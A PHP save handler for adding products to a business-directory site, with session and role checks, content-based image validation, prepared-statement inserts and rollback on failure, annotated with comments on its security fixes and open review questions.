
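<?php
/*
 * Bootstrap for the "add product" save handler: starts the session, loads the
 * database connection and refuses the request unless a company session with an
 * allowed role is present.
 */
session_start();

// All error output is silenced for this request. That keeps internals out of
// the response, but failures are also invisible unless they are logged
// elsewhere -- NOTE(review): confirm server-side error logging is enabled.
error_reporting(0);

include("db/conn.php");

// header() only queues the redirect; without exit the rest of the script
// (file handling and database writes) would still run for an unauthenticated
// request. Every rejection therefore stops the script explicitly.
if (!isset($_SESSION['company_id']) || !isset($_SESSION['company_name'])) {
	session_destroy();
	header("location:login.php");
	exit;
}

// A missing role is treated as "not allowed", and the comparison is strict so
// that a non-string session value cannot loosely match a role name.
$loggedin_role = isset($_SESSION['loggedin_user']) ? $_SESSION['loggedin_user'] : '';
if (!in_array($loggedin_role, array('admin', 'company'), true)) {
	header("location:404.php");
	exit;
}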


/*$target_dir = "uploads/";
code to upload logo
if(!empty($_FILES["product_photo"]["name"]))
{
	 $product_photo = $target_dir ."products/".time()."_".clean($company_name)."_".basename($_FILES["product_photo"]["name"]);
	 echo $product_photo;
	if (move_uploaded_file($_FILES["product_photo"]["tmp_name"], $product_photo)) {
    } else {
        echo "Sorry, there was an error uploading.";exit;
    }
}
else
{
 	$product_photo = $_POST["product_photo"];
}

if(!empty($_FILES["catlog"]["name"]))
{
	 $catlog = $target_dir ."products/".time()."_".clean($company_name)."_".basename($_FILES["catlog"]["name"]);
	 echo $catlog;
	if (move_uploaded_file($_FILES["catlog"]["tmp_name"], $catlog)) {
		
    } else {
        echo "Sorry, there was an error uploading.";exit;
    }
}
else
{
 	$product_photo = $_POST["product_photo"];
}*/

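/*
 * Validate the uploaded "imgname" image.
 *
 * The name and MIME type in $_FILES come from the client and can be set to
 * anything, so the type is taken from the file content and the extension is
 * chosen from a fixed list instead of being copied from the submitted name.
 *
 * NOTE(review): $file_name is computed here but the visible script never uses
 * it; the file that is later moved into uploads/products/ comes from the
 * separate "photo_path" field, which this check does not cover.
 */
$fname = isset($_FILES['imgname']['name']) ? $_FILES['imgname']['name'] : '';
if (empty($fname)) {
	echo "Please upload Image.";
	exit;
}

// Reject every upload error code, not only UPLOAD_ERR_INI_SIZE (1), and make
// sure the temporary path really is a file PHP received in this request.
if ($_FILES['imgname']['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($_FILES['imgname']['tmp_name'])) {
	echo "Image upload error.";
	exit;
}

if ($_FILES['imgname']['size'] >= 2*1024*1024) {
	echo "Image size error. Max size is 2 MB.";
	exit;
}

// Map of accepted image formats to the extension the server will assign.
$image_exts = array(IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif');
$image_info = getimagesize($_FILES['imgname']['tmp_name']);
if ($image_info === false || !isset($image_exts[$image_info[2]])) {
	echo "Image type error. Only JPG, PNG and GIF allowed.";
	exit;
}

$ftype = $image_info['mime'];
$ext = $image_exts[$image_info[2]];
$file_name = date('YmdHis') . "." . $ext;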
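/*
 * Create the product row and, when a catalogue file accompanies the request,
 * store the product photo and link it to the new product.
 *
 * Responds with "success" or one of the error strings below.
 *
 * Changes from the previous version of this block:
 *  - every value reaches MySQL through a bound parameter; request fields and
 *    client file names are no longer concatenated into SQL text;
 *  - the photo is checked by content and saved under a server-chosen name and
 *    extension, so a client-supplied extension never lands in uploads/products/;
 *  - the debug echo of the photo INSERT statement is gone (it exposed table and
 *    column names in the response);
 *  - success is decided from the query results, and the rollback is executed.
 *
 * NOTE(review): as before, nothing is stored or reported when no catalogue file
 * is sent, and the catalogue file itself is never written to $catlogpath; only
 * the path is recorded. If catalogues are meant to be stored, they need their
 * own allow-list of types before being moved.
 * NOTE(review): uploads/products/ should not be configured to execute scripts;
 * confirm the web server configuration.
 */
$product_name     = isset($_POST['product_name']) ? $_POST['product_name'] : '';
$company_id       = $_SESSION['company_id'];
// NOTE(review): my_company_id is taken from the request, not from the session;
// confirm the logged-in company is allowed to create products for it.
$my_company_id    = isset($_POST['my_company_id']) ? $_POST['my_company_id'] : '';
$price            = isset($_POST['price']) ? $_POST['price'] : '';
$discounted_price = isset($_POST['discounted_price']) ? $_POST['discounted_price'] : '';
$catlog           = isset($_FILES["catlog"]["name"]) ? $_FILES["catlog"]["name"] : '';
$offer_des        = isset($_POST['textBox']) ? $_POST['textBox'] : '';
// Apostrophes were previously stripped to keep the SQL string intact; with
// bound parameters the text is stored exactly as submitted.
$description      = isset($_POST['description']) ? $_POST['description'] : '';
$catid            = isset($_POST['catid']) ? $_POST['catid'] : '';
$subcatid         = isset($_POST['subcatid']) ? $_POST['subcatid'] : '';
$photo_path       = isset($_FILES["photo_path"]["name"]) ? $_FILES["photo_path"]["name"] : '';

// An offer exists exactly when offer text was submitted.
$offer_flg = ($offer_des != '') ? 1 : 0;

$has_catlog         = !empty($catlog);
$catlogpath         = '';
$product_photo_path = '';

// Validate the files before touching the database so a rejected upload does
// not leave a half-created product behind.
if ($has_catlog) {
	if ($_FILES["catlog"]['size'] >= 2*1024*1024) {
		echo "Image size error. Max size is 2 MB.";
		exit;
	}

	if (!isset($_FILES["photo_path"]["error"], $_FILES["photo_path"]["tmp_name"])
		|| $_FILES["photo_path"]["error"] !== UPLOAD_ERR_OK
		|| !is_uploaded_file($_FILES["photo_path"]["tmp_name"])) {
		echo "Image upload error.";
		exit;
	}

	if ($_FILES["photo_path"]["size"] >= 2*1024*1024) {
		echo "Image size error. Max size is 2 MB.";
		exit;
	}

	// The type comes from the file content; the extension comes from this list.
	$photo_exts = array(IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif');
	$photo_info = getimagesize($_FILES["photo_path"]["tmp_name"]);
	if ($photo_info === false || !isset($photo_exts[$photo_info[2]])) {
		echo "Image type error. Only JPG, PNG and GIF allowed.";
		exit;
	}

	// Keep a readable part of the submitted name, restricted to safe characters.
	$photo_stem = pathinfo(basename($photo_path), PATHINFO_FILENAME);
	$photo_stem = substr(preg_replace('/[^A-Za-z0-9_-]/', '_', $photo_stem), 0, 100);

	$product_photo_path = time() . "_" . $photo_stem . "." . $photo_exts[$photo_info[2]];
	$catlogpath = "uploads/products/" . time() . "_" . basename($catlog);
}

// Insert the product row.
$adder = false;
$last_id = 0;
$stmt = $connection->prepare("INSERT INTO `busdir_product`(`product_name`, `company_id`,`my_company_id`, `catid`, `subcatid`,  `price`, `discounted_price`, `offer_des`,`offer_flg`,`description`, `active` , `catlog` ,`createdby`) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 'y', ?, ?)");
if ($stmt) {
	$stmt->bind_param('ssssssssisss', $product_name, $company_id, $my_company_id, $catid, $subcatid, $price, $discounted_price, $offer_des, $offer_flg, $description, $catlog, $company_id);
	$adder = $stmt->execute();
	$last_id = $connection->insert_id;
	$stmt->close();
}

if ($adder) {
	if ($has_catlog) {
		$stored_photo = 'uploads/products/' . $product_photo_path;
		$saved = false;

		if (@move_uploaded_file($_FILES["photo_path"]["tmp_name"], $stored_photo)) {
			// Record the catalogue path on the product.
			$updater0 = false;
			$stmt = $connection->prepare("UPDATE busdir_product SET catlog = ? WHERE product_id = ?");
			if ($stmt) {
				$stmt->bind_param('si', $catlogpath, $last_id);
				$updater0 = $stmt->execute();
				$stmt->close();
			}

			// Link the stored photo to the product.
			$updater1 = false;
			$stmt = $connection->prepare("INSERT INTO `busdir_product_photo`(`product_id`, `photo_path`, `createdby`) VALUES (?, ?, ?)");
			if ($stmt) {
				$stmt->bind_param('iss', $last_id, $product_photo_path, $company_id);
				$updater1 = $stmt->execute();
				$stmt->close();
			}

			// Both statements must have succeeded (the earlier code tested the
			// UPDATE's SQL string, which is always truthy).
			$saved = ($updater0 && $updater1);
			if (!$saved) {
				unlink($stored_photo);
			}
		}

		if ($saved) {
			echo "success";
		} else {
			// Undo the partial write: remove any photo row and the product row.
			$stmt = $connection->prepare("DELETE FROM `busdir_product_photo` WHERE `product_id` = ?");
			if ($stmt) {
				$stmt->bind_param('i', $last_id);
				$stmt->execute();
				$stmt->close();
			}
			$stmt = $connection->prepare("DELETE FROM `busdir_product` WHERE `product_id` = ?");
			if ($stmt) {
				$stmt->bind_param('i', $last_id);
				$stmt->execute();
				$stmt->close();
			}

			echo "An unknown error occured. Please try again.";
		}
	}
} else {
	echo "An unknown error occured. Please try again.";
}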
			


?>
